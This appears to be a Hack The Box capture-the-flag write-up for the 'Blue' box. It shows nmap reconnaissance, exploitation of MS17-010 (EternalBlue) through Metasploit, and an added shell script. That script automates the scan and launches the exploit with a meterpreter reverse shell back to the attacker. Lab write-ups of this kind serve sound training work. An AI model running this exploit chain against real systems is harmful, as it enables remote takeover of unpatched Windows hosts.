Hack The Box - Blue

Elliot Parsons
2 min read · Apr 27, 2020
"If you give a hacker a new toy, the first thing he'll do is take it apart to figure out how it works." - Jamie Zawinski

Reconnaissance

To recon this box I started with nmap as usual, running the default scripts and version detection:

nmap -sC -sV 10.10.10.40

After the initial scan the most obvious place to look for a way in is the SMB service on port 445. I ran a second nmap scan, this time with --script vuln, to check port 445 for known vulnerabilities.

nmap --script vuln -p445 10.10.10.40

The scan flags MS17-010 (EternalBlue), so that looks to be the way in. I used searchsploit to check for public exploits.

searchsploit ms17-010

Exploitation

For the exploitation step, the .rb entries in the searchsploit results indicate there is a Metasploit module. After opening msfconsole, a search for 17-010 gives a few results.

search 17-010

Since I know from the first nmap scan that the host is running Windows 7, I use result #3. The index numbers in the search output depend on the installed Metasploit version, so selecting the module by its full path (exploit/windows/smb/ms17_010_eternalblue, the module for Windows 7 / Server 2008 R2 targets) is more reliable than use 3. Once it's loaded, all that's left is to check whether any options need to be set and then run the exploit.

options

The only required option without a default value is RHOSTS. LHOST is pre-filled with a local interface address; confirm it is your VPN (tun0) address, otherwise the reverse shell never connects back. After setting RHOSTS to 10.10.10.40 it's time to run the exploit using either the run or exploit command.

run

The exploit ran successfully and whoami reports NT AUTHORITY\SYSTEM, so both flags can be collected without any privilege escalation step.

flags
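To make the recon check and the exploitation step repeatable, here is an added shell script (my example, not part of the original write-up) that scopes the nmap smb-vuln-ms17-010 result correctly and drives msfconsole from a resource file instead of typing the commands by hand. The nmap output embedded in it is a constructed sample so the parsing can be exercised offline; 10.10.10.40 is the box from the post, and 10.10.14.5 is an assumed VPN address that must be replaced with yours.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Reproduces the manual flow: confirm MS17-010 with nmap, then drive
# msfconsole from a resource file instead of typing the commands by hand.
# Assumptions: 10.10.10.40 is the box from the post; 10.10.14.5 is an assumed
# VPN (tun0) address and must be replaced with yours.
set -eu

# Constructed sample of `nmap --script smb-vuln-ms17-010` output for a
# vulnerable host, embedded so the parsing can be exercised offline.
SAMPLE_VULNERABLE='Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14'

# Constructed sample for a host where a different script reports VULNERABLE
# but smb-vuln-ms17-010 is absent: a naive grep for "VULNERABLE" would
# misfire here.
SAMPLE_OTHER_VULN='Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2008-4250'

# Returns 0 only when the smb-vuln-ms17-010 block itself says State: VULNERABLE.
# --script vuln runs many scripts, so the check is scoped to that block rather
# than to the whole output.
is_ms17_010_vulnerable() {
    printf '%s\n' "$1" | awk '
        /^\| smb-vuln-ms17-010:/ { in_block = 1; next }  # start of our block
        /^\| [^ ]/               { in_block = 0 }        # start of another script
        in_block && /State: VULNERABLE/ { found = 1 }
        END { exit !found }
    '
}

# Prints an msfconsole resource script equivalent to the manual steps:
# use the Windows 7 / 2008 R2 EternalBlue module, set RHOSTS and LHOST, run.
# The payload line makes the module's default explicit.
build_msf_rc() {
    rhost=$1
    lhost=$2
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set LHOST $lhost
set payload windows/x64/meterpreter/reverse_tcp
run
EOF
}

# Live flow: scan, gate on the scoped result, then hand off to msfconsole.
main() {
    target=${1:-10.10.10.40}
    lhost=${2:-10.10.14.5}
    scan=$(nmap --script smb-vuln-ms17-010 -p445 "$target")
    if is_ms17_010_vulnerable "$scan"; then
        build_msf_rc "$target" "$lhost" > ms17_010.rc
        msfconsole -q -r ms17_010.rc
    else
        echo "$target: smb-vuln-ms17-010 did not report VULNERABLE, not exploiting" >&2
        exit 1
    fi
}

# Only touch the network when a target is given on the command line.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

Run it as ./blue.sh 10.10.10.40 <your tun0 address>. The gate looks only inside the smb-vuln-ms17-010 block because --script vuln runs dozens of scripts and another check (the MS08-067 sample above) can also print VULNERABLE. The ms17_010_eternalblue module has its own check command, so adding a check line before run in the resource file is a reasonable way to get Metasploit's confirmation as well.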
